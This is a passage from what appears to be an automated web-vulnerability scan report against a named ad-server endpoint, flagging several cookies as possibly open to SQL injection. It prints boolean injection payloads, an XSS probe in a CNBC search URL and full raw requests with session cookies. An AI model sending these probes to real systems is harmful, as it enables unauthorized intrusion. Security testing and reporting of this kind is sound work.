Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=6&k=cnbc+search:80,script+alert:80,title+script:80,xss36c5e+title:80,script+2789f6ff334a89918:80,search+results:72,matching+symbols:64,sponsored+results:64,refine+results:64,cnbc:46,xss36c5e:40,script:40,search+result:32,refine+result:32,matching+symbol:32,sponsored+result:32,2789f6ff334a89918:24,cnbc+pro:24,title:20,alert:20,asia+pacific:16,special+reports:16,last:16,date:16,sponsored:16,matching:16,symbols:16,refine:16,format:16,cnbc+tv:16,video:14,days:12,stock+screener:8,ceo+interviews:8,earnings+front:8,special+report:8,member+center:8,fund+screener:8,symbol+lookup:8,markets+front:8,&rd=burp&t=xss36c5e HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss36c5e%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E2789f6ff334a89918&categories=exclude&searchboxinput=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530'%20and%201%3d1--%20; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=12|4|8|0; rdk=6451/11953; rdk15=0; ses15=11953^2; csi15=3187871.js^1^1308225219^1308225219&3206204.js^1^1308225202^1308225202

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 12:08:53 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 12:08:53 GMT; Path=/
Set-Cookie: dq=17|4|13|0; Expires=Fri, 15-Jun-2012 12:08:53 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=6&k=cnbc+search:80,script+alert:80,title+script:80,xss36c5e+title:80,script+2789f6ff334a89918:80,search+results:72,matching+symbols:64,sponsored+results:64,refine+results:64,cnbc:46,xss36c5e:40,script:40,search+result:32,refine+result:32,matching+symbol:32,sponsored+result:32,2789f6ff334a89918:24,cnbc+pro:24,title:20,alert:20,asia+pacific:16,special+reports:16,last:16,date:16,sponsored:16,matching:16,symbols:16,refine:16,format:16,cnbc+tv:16,video:14,days:12,stock+screener:8,ceo+interviews:8,earnings+front:8,special+report:8,member+center:8,fund+screener:8,symbol+lookup:8,markets+front:8,&rd=burp&t=xss36c5e HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss36c5e%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E2789f6ff334a89918&categories=exclude&searchboxinput=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530'%20and%201%3d2--%20; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=12|4|8|0; rdk=6451/11953; rdk15=0; ses15=11953^2; csi15=3187871.js^1^1308225219^1308225219&3206204.js^1^1308225202^1308225202

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 12:08:53 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.28. http://tap.rubiconproject.com/oz/sensor [put_1994 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The put_1994 cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the put_1994 cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=13&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:118,energy:114,union:86,billion+cnbc:80,transfer:72,southern:72,posted+yet:64,cnbc+welcomes:64,must+click:64,cnbc+highlights:64,please+respect:64,cnbc+reserves:64,related+links:64,2011:56,asia+pacific:56,datetime+05:56,5+27:48,6+16:48,05+24:48,2011+5:48,16+2011:48,special+reports:48,expiration+datetime:48,datetime+6:48,datetime:46,billion:46,equity+will:40,energy+news:40,will+benefit:40,will+buy:40,datetime+11:40,24+54:40,burgeoning+u:40,union+company:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w'%20and%201%3d1--%20; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=19|4|15|0; rdk2=0; ses2=11953^3; csi2=3183300.js^1^1308227126^1308227126&3187870.js^2^1308226504^1308226815; rdk=6451/11953; rdk15=0; ses15=11953^8; csi15=3206204.js^3^1308225202^1308227128&3187871.js^5^1308225219^1308226816; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 13:09:54 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 13:09:54 GMT; Path=/
Set-Cookie: dq=27|4|23|0; Expires=Fri, 15-Jun-2012 13:09:54 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=13&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:118,energy:114,union:86,billion+cnbc:80,transfer:72,southern:72,posted+yet:64,cnbc+welcomes:64,must+click:64,cnbc+highlights:64,please+respect:64,cnbc+reserves:64,related+links:64,2011:56,asia+pacific:56,datetime+05:56,5+27:48,6+16:48,05+24:48,2011+5:48,16+2011:48,special+reports:48,expiration+datetime:48,datetime+6:48,datetime:46,billion:46,equity+will:40,energy+news:40,will+benefit:40,will+buy:40,datetime+11:40,24+54:40,burgeoning+u:40,union+company:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w'%20and%201%3d2--%20; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=19|4|15|0; rdk2=0; ses2=11953^3; csi2=3183300.js^1^1308227126^1308227126&3187870.js^2^1308226504^1308226815; rdk=6451/11953; rdk15=0; ses15=11953^8; csi15=3206204.js^3^1308225202^1308227128&3187871.js^5^1308225219^1308226816; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 13:09:54 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.29. http://tap.rubiconproject.com/oz/sensor [put_2054 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The put_2054 cookie appears to be vulnerable to SQL injection attacks. The payloads 45036362'%20or%201%3d1--%20 and 45036362'%20or%201%3d2--%20 were each submitted in the put_2054 cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=54&k=southern+union:336,energy+transfer:320,buy+southern:208,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:122,energy:114,billion+cnbc:80,union:72,transfer:72,southern:72,must+click:64,cnbc+highlights:64,please+respect:64,cnbc+reserves:64,related+links:64,cnbc+welcomes:64,posted+yet:64,2011:56,asia+pacific:56,datetime+08:56,expiration+datetime:48,datetime+6:48,16+2011:48,2011+8:48,6+16:48,8+06:48,special+reports:48,datetime:46,billion:46,union+company:40,gas+production:40,will+buy:40,transfer+partners:40,midstream+company:40,large+midstream:40,will+benefit:40,energy+news:40,equity+will:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa445036362'%20or%201%3d1--%20; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; khaos=GOVBRMNC-I-DXQD; cd=false; dq=44|4|40|0; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%263512%3D1%262197%3D1%262579%3D1%263811%3D1%262374%3D1; ses2=11953^33; csi2=2553662.js^7^1308233336^1308236745&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126; rdk=6451/11953; ses15=11953^39; csi15=2553663.js^8^1308234261^1308236739&1295121.js^1^1308235497^1308235497&1295156.js^2^1308233638^1308233949&3187871.js^25^1308225219^1308233336&3206204.js^3^1308225202^1308227128

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 15:06:21 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 15:06:22 GMT; Path=/
Set-Cookie: dq=45|4|41|0; Expires=Fri, 15-Jun-2012 15:06:22 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=54&k=southern+union:336,energy+transfer:320,buy+southern:208,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:122,energy:114,billion+cnbc:80,union:72,transfer:72,southern:72,must+click:64,cnbc+highlights:64,please+respect:64,cnbc+reserves:64,related+links:64,cnbc+welcomes:64,posted+yet:64,2011:56,asia+pacific:56,datetime+08:56,expiration+datetime:48,datetime+6:48,16+2011:48,2011+8:48,6+16:48,8+06:48,special+reports:48,datetime:46,billion:46,union+company:40,gas+production:40,will+buy:40,transfer+partners:40,midstream+company:40,large+midstream:40,will+benefit:40,energy+news:40,equity+will:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa445036362'%20or%201%3d2--%20; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; khaos=GOVBRMNC-I-DXQD; cd=false; dq=44|4|40|0; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%263512%3D1%262197%3D1%262579%3D1%263811%3D1%262374%3D1; ses2=11953^33; csi2=2553662.js^7^1308233336^1308236745&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126; rdk=6451/11953; ses15=11953^39; csi15=2553663.js^8^1308234261^1308236739&1295121.js^1^1308235497^1308235497&1295156.js^2^1308233638^1308233949&3187871.js^25^1308225219^1308233336&3206204.js^3^1308225202^1308227128

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 15:06:22 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.30. http://tap.rubiconproject.com/oz/sensor [put_2101 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The put_2101 cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the put_2101 cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=14&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:118,energy:114,union:86,billion+cnbc:80,southern:72,transfer:72,please+respect:64,related+links:64,cnbc+welcomes:64,posted+yet:64,cnbc+highlights:64,must+click:64,cnbc+reserves:64,datetime+05:56,2011:56,asia+pacific:56,2011+5:48,5+36:48,6+16:48,expiration+datetime:48,16+2011:48,special+reports:48,datetime+6:48,datetime:46,billion:46,will+benefit:40,energy+news:40,equity+will:40,burgeoning+u:40,union+company:40,gas+production:40,transfer+equity:40,datetime+11:40,midstream+company:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1'%20and%201%3d1--%20; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; cd=false; dq=21|4|17|0; rdk2=0; ses2=11953^5; csi2=3187870.js^4^1308226504^1308227750&3183300.js^1^1308227126^1308227126; rdk=6451/11953; rdk15=0; ses15=11953^10; csi15=3187871.js^7^1308225219^1308227751&3206204.js^3^1308225202^1308227128

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 13:11:48 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 13:11:48 GMT; Path=/
Set-Cookie: dq=27|4|23|0; Expires=Fri, 15-Jun-2012 13:11:48 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=14&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:118,energy:114,union:86,billion+cnbc:80,southern:72,transfer:72,please+respect:64,related+links:64,cnbc+welcomes:64,posted+yet:64,cnbc+highlights:64,must+click:64,cnbc+reserves:64,datetime+05:56,2011:56,asia+pacific:56,2011+5:48,5+36:48,6+16:48,expiration+datetime:48,16+2011:48,special+reports:48,datetime+6:48,datetime:46,billion:46,will+benefit:40,energy+news:40,equity+will:40,burgeoning+u:40,union+company:40,gas+production:40,transfer+equity:40,datetime+11:40,midstream+company:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1'%20and%201%3d2--%20; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; cd=false; dq=21|4|17|0; rdk2=0; ses2=11953^5; csi2=3187870.js^4^1308226504^1308227750&3183300.js^1^1308227126^1308227126; rdk=6451/11953; rdk15=0; ses15=11953^10; csi15=3187871.js^7^1308225219^1308227751&3206204.js^3^1308225202^1308227128

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 13:11:48 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.31. http://tap.rubiconproject.com/oz/sensor [rdk cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The rdk cookie appears to be vulnerable to SQL injection attacks. The payloads 19874108'%20or%201%3d1--%20 and 19874108'%20or%201%3d2--%20 were each submitted in the rdk cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=93&k=southern+union:328,energy+transfer:312,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:122,energy:112,billion+cnbc:80,union:72,transfer:72,southern:72,please+respect:64,must+click:64,cnbc+reserves:64,cnbc+highlights:64,related+links:64,cnbc+welcomes:64,posted+yet:64,2011:56,asia+pacific:56,datetime+08:56,expiration+datetime:48,datetime+6:48,16+2011:48,2011+8:48,8+27:48,6+16:48,special+reports:48,billion:46,datetime:46,union+company:40,will+buy:40,burgeoning+u:40,11+billion:40,transfer+partners:40,midstream+company:40,large+midstream:40,will+benefit:40,energy+news:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
